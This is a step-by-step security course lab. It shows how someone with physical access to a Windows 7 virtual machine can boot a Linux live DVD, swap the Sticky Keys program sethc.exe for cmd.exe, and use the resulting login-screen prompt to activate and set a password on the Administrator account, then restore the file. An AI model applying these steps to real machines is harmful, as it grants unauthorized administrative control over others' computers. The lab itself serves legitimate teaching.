ComputerSecurityStudent (CSS) [Login] [Join Now]


|FORENSICS >> LosBuntu >> Current Page |Views: 11923

(LosBuntu: Lesson 2)

{ Activate & Set Windows 7 Admin Password By Circumventing Accessibility Feature }

Section 0. Background Information
  1. What is the scenario?
    • This lesson will illustrate how a malicious intruder, with physical access, can circumvent the Windows 7 accessibilities option to (1) not only activate the local Administrator account, (2) but also set its' password, no matter if Active Directory is being used or not.
     
  2. What is sethc.exe 
    • sethc.exe is a program that controls some the accessibility options for disabled people to read the login prompt.
    • The accessibility option is invoked by clicking in the Windows Password Box and pressing the shift key 5 times.  
    • From the windows login screen, winlogon.exe launches sethc.exe that provides the aforementioned accessibilities options.
    • Consequently, sethc.exe can be compromised, since the winlogin.exe does not exactly check what is launched when pressing the shift key 5 times in the password text box.

  3. What is LosBuntu?
    • I wanted to thank my good friend Carlos Cajigas (@carlos_cajigas) for creating LosBuntu and for his generous guidance and mentorship in Cyber Forensics.
    • LosBuntu is a Linux Live DVD distribution (distro) that can be used to assist in data forensic investigations.  It is a compilation of Master Cajigas' many years of experience as a former law enforcement agent and IBM forensics investigator.

  4. Lab Notes
    • In this lab we will do the following:
      1. Download the LosBuntu iso
      2. De-Activate the Administrator Account
      3. Boot Windows 7 VM into the LosBuntu Environment
      4. Mount the Windows 7 Data Partition
      5. Replace accessibility (sethc.exe) program with (cmd.exe)
      6. Enable accessibility option by pressing shift 5 times
      7. We will active and reset the Administrator account
      8. We will restore accessibility option

  5. Prerequisites
  6. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2016 No content replication of any kind is allowed without express written permission.
 
Section 1: Download the LosBuntu ISO
  • Note: Continue to the next Section if you have already downloaded LosBuntu.
  1. Open Firefox (Host Machine)
    • Instructions:
      1. Click the Start Button
      2. Type firefox in the search box
      3. Click the firefox icon

     

  2. Start LosBuntu Download (Part 1)
    • Instructions:
      1. Navigate to the following URL
        • http://www.mashthatkey.com/2015/01/mash-that-key-releases-losbuntu.html
      2. Scroll Down until you see the LosBuntu Link
      3. Click on LosBuntu

     

  3. Start LosBuntu Download (Part 2)
    • Instructions:
      1. Click the Download button

     

  4. Start LosBuntu Download (Part 3)
    • Instructions:
      1. Click Download anyway
      2. Click the Save File radio button
      3. Click the OK button

     

  5. Save LosBuntu
    • Instructions:
      1. Navigate to your desired destination directory
        • In my case, C:\CSS\ISOs
      2. File name: LosBuntu_2016_02_01.iso
      3. Save as type: ISO Image File (*.iso)
      4. Click the Save button
    • Note(FYI):
      1. LosBuntu is subject to continual version updates.


Section 2: Start your Windows 7 VM
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player

     

  2. Edit Virtual Machine Settings
    • Instructions
      1. Click on Damn Vulnerable Windows 7
      2. Click on Edit virtual machine settings

     

  3. Configure CD/DVE(IDE)
    • Instructions:
      1. Select CD/DVD (IDE)
      2. Click on the Use physical drive: radio button
      3. Select Auto detect
    • Note(FYI):
      1. Do not click on the OK Button

     

  4. Configure Memory
    • Instructions:
      1. Select Memory
      2. Click on "1 GB"
    • Note(FYI):
      • Do not click on the OK Button

     

  5. Configure Network Adapter
    • Instructions:
      1. Select Network Adapter
      2. Click the radio button "NAT: Used to share the host's IP address"
      3. Click the OK button
    • Note(FYI):
      1. We will use NAT instead of bridged, because of multiple VMware Player issues with Windows 7 not acquiring an IP Address when using a Wireless connection.

     

  6. Start Damn Vulnerable Windows 7
    • Instructions
      1. Click on Damn Vulnerable Windows 7
      2. Click on Play virtual machine

 

Section 3: Login to Windows 7 and De-Activate Administrator Account
  • Note: Below we will De-Activate the Administrator Account.
  1. Select Login User
    • Instructions:
      1. Click on Security Student
    • Note(FYI):
      • Security Student does belong to the Administrators group. 

     

  2. Login as Security Student
    • Instructions:
      1. Supply the student password (abc123).
      2. Click on the arrow

     

  3. Open a Command Prompt
    • Instructions:
      1. Click the Start Button
      2. Search for cmd
      3. Right Click on cmd
      4. Click on Run as administrator

     

  4. User Account Control
    • Instructions:
      1. Click the Yes Button

     

  5. De-Activate the Administrator Account
    • Instructions:
      1. mkdir C:\LosBuntu
      2. cd C:\LosBuntu
      3. net users Administrator /active:no
      4. net users Administrator > admin_off.txt
      5. type admin_off.txt | findstr "active"
    • Note(FYI):
      • Command #1, Use (mkdir) to create a (C:\LosBuntu) folder.
      • Command #2, Use (cd) to change directory into the (C:\LosBuntu) folder.
      • Command #3, De-Activate the Administrative Account by setting the  active flag to no. (E.g., /active:no).
      • Command #4, Use (net users) and the greater than operator (>) to create a file (admin_off.txt) that contains the results of the following command (net users Administrator).
      • Command #5, Use (type) to display the contents of the file (admin_off.txt) and use (findstr) to only display output that contains the string (active).

     

  6. Poweroff Windows 7
    • Instructions:
      1. shutdown /p
    • Note(FYI):
      • Command #1, Use (shutdown) with the (/p) flag to poweroff the virtual machine.

 

Section 4: Configure and Boot Windows 7 VM Using a LosBuntu Live CD
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player

     

  2. Edit Virtual Machine Settings
    • Instructions
      1. Click on Damn Vulnerable Windows 7
      2. Click on Edit virtual machine settings

     

  3. Configure Memory
    • Instructions:
      1. Select Memory
      2. Select on "2048 MB"
    • Note(FYI):
      • 1 GB to 2 GB is sufficient.

     

  4. Configure CD/DVD Settings
    • Instructions:
      1. Click on CD/DVD(IDE)
      2. Check Connected
      3. Select Use ISO image file:
      4. Click the Browse Button
      5. Navigate to the LosBuntu_2016_02_01.iso

     

  5. Configure Network Adapter
    • Instructions:
      1. Select Network Adapter
      2. Click the radio button "NAT: Used to share the host's IP address"
        • NAT or Bridged will work.  I left it NAT, because that is what it was previously set to for the Damn Vulnerable Windows 7 VM.
      3. Click the OK button

     

  6. Start Damn Vulnerable Windows 7
    • Instructions
      1. Click on Damn Vulnerable Windows 7
      2. Click on Play virtual machine

     

  7. Access the Boot Menu
    • Instructions
      1. Left Click in the Black part of the screen once you see the vmware screen.
      2. Press the <Esc> key
    • Note(FYI)
      • This might take a few attempts so please do not get frustrated.

     

  8. Boot from CD-ROM Drive
    • Instructions
      1. Arrow Down to where CD-ROM Drive is highlighted
      2. Press <Enter>

     

  9. LosBuntu Boot Menu
    • Instructions
      1. Arrow Down to where live - boot the Live System is highlighted
      2. Press <Enter>

 

Section 5: Login to LosBuntu
  1. Login To LosBuntu
    • Instructions:
      1. Password: mtk
      2. Press <Enter>

     

  2.  Open Terminal Window
    • Instructions:
      1. Click on the Terminal Window

     

  3. Terminal Window (Profile Preferences)
    • Instructions:
      1. Edit --> Profile Preferences

     

  4.  Terminal Window (Profile Colors)
    • Instructions:
      1. Click the Colors Tab
      2. Uncheck Use colors from system theme
      3. Built-in schemes: Black on white

     

  5. Terminal Window (Profile Background)
    • Instructions:
      1. Click the Background Tab
      2. Shade transparent or image background: Maximum
      3. Click the Close Button

     

  6. Become root
    • Instructions:
      1. sudo su -
      2. password: mtk
      3. pwd
    • Note(FYI):
      • Command #1, Use (sudo su -) to simulate an initial root login where the /etc/profile, .profile and .bashrc are executed.  Not only will the root user's environment be present, but also the root user will be placed in it's own home directory (/root).
      • Command #2, Use (pwd) to display the current working directory of the particular user.

     

  7. Obtain IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • Command #1, Use (ifconfig -a) to view your IP Address.  If the eth0 interface does not have an IP address, then use dhclient to make a DHCP request to obtain an IP address.

 

Section 6: Hard Disk Information
  1. Using fdisk
    • Instructions:
      1. fdisk -l
      2. Notice /dev/sda is a 5 GB (5358 MB) Drive.  This is the Hard Disk you created in RDP MS12-020 Exploit Lesson, Section 11.  This drive only has one partition that is visualized as (/dev/sda1).
      3. Notice /dev/sdb is a much bigger Drive (136 GB).  The size of your drive will probably be different.  It has two partitions.
        • /dev/sdb1 - This is the boot partition which is identified with apostrophe (*) under Boot.
        • /dev/sdb2 - This is the partition that holds all the operating system and user data. This is the partition that contains sethc.exe and cmd.exe.
    • Note(FYI):
      • Command #1, Use (fdisk -l) to view both disks (/dev/sda, /dev/sdb) and their partition tables (/dev/sda1, /dev/sdb1 and /dev/sdb2).

     

  2. Mount Windows 7 Data Partition
    • Instructions:
      1. mkdir -p /mnt/sdb2
      2. mount /dev/sdb2 /mnt/sdb2
      3. df -k
    • Note(FYI):
      • Command #1: Use (mkdir) to create the directory (/mnt/sdb2).  Use the (-p) to suppress errors if the directory already exists.
      • Command #2: Use (mount) to mount (ie, access) the Windows 7 Data Partition (/dev/sdb2) to the previously created directory (/mnt/sdb2).
      • Command #3: Use (df -k) to display file systems and their disk usage.  Notice the last (df -k) entry is (/mnt/sdb2).  Now you have access to the Windows 7 Data Partition.

     

  3. Enter the Windows 7 Data Partition
    • Instructions:
      1. cd /mnt/sdb2
      2. ls
      3. cd Windows/System32
    • Note(FYI):
      • Command #1: Use (cd) to change directory in /mnt/sdb2.  Remember we mounted the Windows 7 data partition (/dev/sdb2) to the mount point (/mnt/sdb2).
      • Command #2: Use (ls) to list the contents (/mnt/sdb2) directory, which is essentially the Windows 7 C: Drive.
      • Command #3: Use (cd) to change directory into the Windows/System32 folder.

     

  4. Start Typescript
    • Instructions:
      1. script ../../LosBuntu/password_reset.txt
    • Note(FYI):
      • Command #1: Use (script) to make a typescript of everything printed on your terminal. It is useful for students who need a hardcopy record of an interactive session as proof of an assignment

     

  5. Replace sethc.exe with cmd.exe
    • Instructions
      1. ls -l sethc.exe
      2. cp sethc.exe sethc.exe.bkp
      3. md5sum sethc.exe*
      4. cp cmd.exe sethc.exe
      5. ls -l sethc.exe*
      6. md5sum sethc.exe*
    • Notes (FYI)
      • Command #1: Use (ls -l) to display a more detail listing of the (sethc.exe) file.  The (sethc.exe) program controls some the accessibility options for disabled people to read the login prompt.
      • Command #2: Use (cp) to make a backup copy of the (sethc.exe) file.
      • Command #3: Use (md5sum) to compute the MD5 message digest of both the (sethc.exe) and (sethc.exe.bkp) files to show they are exactly the same.  Notice they have the exact same MD5 Hash signature.
      • Command #4: Use (cp) to replace a the accessibility options program (sethc.exe) with a regular command prompt (cmd.exe).
      • Command #5: Use (ls -l) and the wildcard(*) to display both the newly copied (sethc.exe) program and the original backup file (sethc.exe.bkp).  Notice the byte size is the not the same.
      • Command #6: Use (md5sum) to compute the MD5 message digest of both the (sethc.exe) and (sethc.exe.bkp) files to show they are exactly the same.  Notice that (sethc.exe) differs from (sethc.exe.bkp), because (sethc.exe) is really (cmd.exe).

     

  6. Un-Mount and Reboot
    • Instructions
      1. exit
      2. cd /
      3. umount /mnt/sdb2
      4. reboot
    • Notes (FYI)
      • Command #1: Use (exit) to exit out of the typescript.
      • Command #2: Use (cd /) to change directory to the root (/) directory.  Generally, this is required before un-mounting a directory.
      • Command #3: Use (umount) to un-mount the mount point (/mnt/sdb2) which is the Windows 7 Data partition.
      • Command #4: Use (reboot) to restart the machine.

     

  7. Media Message
    • Instructions
      1. Press the <Enter> key
    • Notes (FYI)
      • Command #1: Make sure your mouse is clicked inside the VM, before pressing <Enter>.

 

Section 7: Implement the Accessibility Option
  1. Select Least Privilege User
    • Instructions
      1. Click on John Doe
    • Notes (FYI)
      • John Doe is a least privileged user.

     

  2. Activate Accessibility Option
    • Instructions
      1. In the password box, Press the Shift Key 5 Times

     

  3. Do you want to turn on Sticky Keys?
    • Instructions:
      1. Click No

     

  4. Administrative Command Prompt
    • Note(FYI):
      • Now you will see an administrative command prompt. 
    • Instructions:
      1. Notice this is an Administrative Command prompt :)
      2. net users Administrator password /active:yes
        • Obviously, (password) is a very weak password.
      3. net users Administrator > C:\LosBuntu\activate.txt
      4. shutdown -r -t 1

     

  5. Login as Administrator
    • Instructions
      1. Click the Administrator account
    • Note(FYI)
      • Previously, the Security Student and John Doe Accounts were the only active account.

     

  6. Supply Administrator Password
    • Instructions
      1. Supply the Administrator password (password).
      2. Click on the arrow

     

  7. Open a Command Prompt
    • Instructions:
      1. Click the Start Button
      2. Search for cmd
      3. Click on cmd

     

  8. Poweroff Windows 7
    • Instructions:
      1. shutdown /p
    • Note(FYI):
      • Command #1, Use (shutdown) with the (/p) flag to poweroff the virtual machine.  We are going to poweroff the VM so we can restore the (sethc.exe) program with LosBuntu.

 

Section 8: Configure and Boot Windows 7 VM with LosBuntu Live CD (Again)
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player

     

  2. Edit Virtual Machine Settings
    • Instructions
      1. Click on Damn Vulnerable Windows 7
      2. Click on Edit virtual machine settings

     

  3. Configure Memory
    • Instructions:
      1. Select Memory
      2. Select on "2048 MB"
    • Note(FYI):
      • 1 GB to 2 GB is sufficient.

     

  4. Configure CD/DVD Settings
    • Instructions:
      1. Click on CD/DVD(IDE)
      2. Check Connected
      3. Select Use ISO image file:
      4. Click the Browse Button
      5. Navigate to the LosBuntu_2016_02_01.iso
        • In my case, C:\CSS\ISOs\LosBuntu_2016_02_01.iso

     

  5. Configure Network Adapter
    • Instructions:
      1. Select Network Adapter
      2. Click the radio button "NAT: Used to share the host's IP address"
        • NAT or Bridged will work.  I left it NAT, because that is what it was previously set to for the Damn Vulnerable Windows 7 VM.
      3. Click the OK button

     

  6. Start Damn Vulnerable Windows 7
    • Instructions
      1. Click on Damn Vulnerable Windows 7
      2. Click on Play virtual machine

     

  7. Access the Boot Menu
    • Instructions
      1. Left Click in the Black part of the screen once you see the vmware screen.
      2. Press the <Esc> key
    • Note(FYI)
      • This might take a few attempts so please do not get frustrated.

     

  8. Boot from CD-ROM Drive
    • Instructions
      1. Arrow Down to where CD-ROM Drive is highlighted
      2. Press <Enter>

     

  9. LosBuntu Boot Menu
    • Instructions
      1. Arrow Down to where live - boot the Live System is highlighted
      2. Press <Enter>

 

Section 9: Login to LosBuntu (Again)
  1. Login To LosBuntu
    • Instructions:
      1. Password: mtk
      2. Press <Enter>

     

  2.  Open Terminal Window
    • Instructions:
      1. Click on the Terminal Window

     

  3. Terminal Window (Profile Preferences)
    • Instructions:
      1. Edit --> Profile Preferences

     

  4.  Terminal Window (Profile Colors)
    • Instructions:
      1. Click the Colors Tab
      2. Uncheck Use colors from system theme
      3. Built-in schemes: Black on white

     

  5. Terminal Window (Profile Background)
    • Instructions:
      1. Click the Background Tab
      2. Shade transparent or image background: Maximum
      3. Click the Close Button

     

  6. Become root
    • Instructions:
      1. sudo su -
      2. password: mtk
      3. pwd
    • Note(FYI):
      • Command #1, Use (sudo su -) to simulate an initial root login where the /etc/profile, .profile and .bashrc are executed.  Not only will the root user's environment be present, but also the root user will be placed in it's own home directory (/root).
      • Command #2, Use (pwd) to display the current working directory of the particular user.

     

  7. Obtain IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • Command #1, Use (ifconfig -a) to view your IP Address.  If the eth0 interface does not have an IP address, then use dhclient to make a DHCP request to obtain an IP address.

 

Section 10: Mount Windows 7 Data Partition
  1. Mount Windows 7 Data Partition
    • Instructions:
      1. mkdir -p /mnt/sdb2
      2. mount /dev/sdb2 /mnt/sdb2
      3. df -k
    • Note(FYI):
      • Command #1: Use (mkdir) to create the directory (/mnt/sdb2).  Use the (-p) to suppress errors if the directory already exists.
      • Command #2: Use (mount) to mount (ie, access) the Windows 7 Data Partition (/dev/sdb2) to the previously created directory (/mnt/sdb2).
      • Command #3: Use (df -k) to display file systems and their disk usage.  Notice the last (df -k) entry is (/mnt/sdb2).  Now you have access to the Windows 7 Data Partition.

     

  2. Enter the Windows 7 Data Partition
    • Instructions:
      1. cd /mnt/sdb2
      2. ls
      3. cd Windows/System32
    • Note(FYI):
      • Command #1: Use (cd) to change directory in /mnt/sdb2.  Remember we mounted the Windows 7 data partition (/dev/sdb2) to the mount point (/mnt/sdb2).
      • Command #2: Use (ls) to list the contents (/mnt/sdb2) directory, which is essentially the Windows 7 C: Drive.
      • Command #3: Use (cd) to change directory into the Windows/System32 folder.

     

  3. Start Typescript
    • Instructions:
      1. script ../../LosBuntu/restore_sethc.txt
    • Note(FYI):
      • Command #1: Use (script) to make a typescript of everything printed on your terminal. It is useful for students who need a hardcopy record of an interactive session as proof of an assignment

     

  4. Restore sethc.exe from sethc.exe.bkp
    • Instructions
      1. md5sum sethc.exe*
      2. cp sethc.exe.bkp sethc.exe
      3. md5sum sethc.exe*
    • Notes (FYI)
      • Command #1: Use (md5sum) to compute the MD5 message digest of both the (sethc.exe) and (sethc.exe.bkp) files to display their different MD5 Hash signatures.  Remember that (sethc.exe) is really (cmd.exe).
      • Command #2: Use (cp) to restore (sethc.exe) from its' backup file (sethc.exe.bkp).
      • Command #3: Use (md5sum) to compute the MD5 message digest of both the (sethc.exe) and (sethc.exe.bkp) files to show they are exactly the same now.  Notice they have the exact same MD5 Hash signature.

     

  5. Un-Mount Windows 7 Data Partition
    • Instructions
      1. exit
    • Note(FYI):
      • Command #1: Use (exit) to exit out of the typescript.

 

Section 11: Proof of Lab
  1. Proof of Lab
    • Instructions
      1. cd /mnt/sdb2/LosBuntu
      2. strings password_reset.txt | grep "cp cmd.exe sethc.exe"
      3. grep active admin_off.txt
      4. strings restore_sethc.txt | grep "sethc.exe"
      5. grep active activate.txt
      6. date
      7. echo "Your Name"
    • Proof of Lab Instructions
      1. Press the <Ctrl> and <Alt> key at the same time.
      2. Press the <PrtScn> key.
      3. Paste into a word document
      4. Upload to Moodle
    • Note(FYI):
      • Command #1: Use (cd) to navigate to and enter the C:\LosBuntu directory that is located in (/mnt/sdb2/LosBuntu).
      • Command #2: Use (strings) to display only printable characters.  Use (grep) to display only lines that contain (cp cmd.exe sethc.exe).
      • Command #3,5: Use (grep) to display only lines that contain (active).
      • Command #4: Use (strings) to display only printable characters.  Use (grep) to display only lines that contain (sethc.exe).

     

  2. Un-Mount and Poweroff
    • Instructions
      1. cd /
      2. umount /mnt/sdb2
      3. poweroff
    • Notes (FYI)
      • Command #1: Use (cd) to navigate to the root (/) directory.
      • Command #2: Use (umount) to un-mount the Windows 7 Data Partition (/dev/sdb2).
      • Command #3: Use (poweroff) totally shutdown and poweroff the Windows 7 VM.

     

  3. Media Message
    • Instructions
      1. Press the <Enter> key
    • Notes (FYI)
      • Command #1: Make sure your mouse is clicked inside the VM, before pressing <Enter>.

 


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth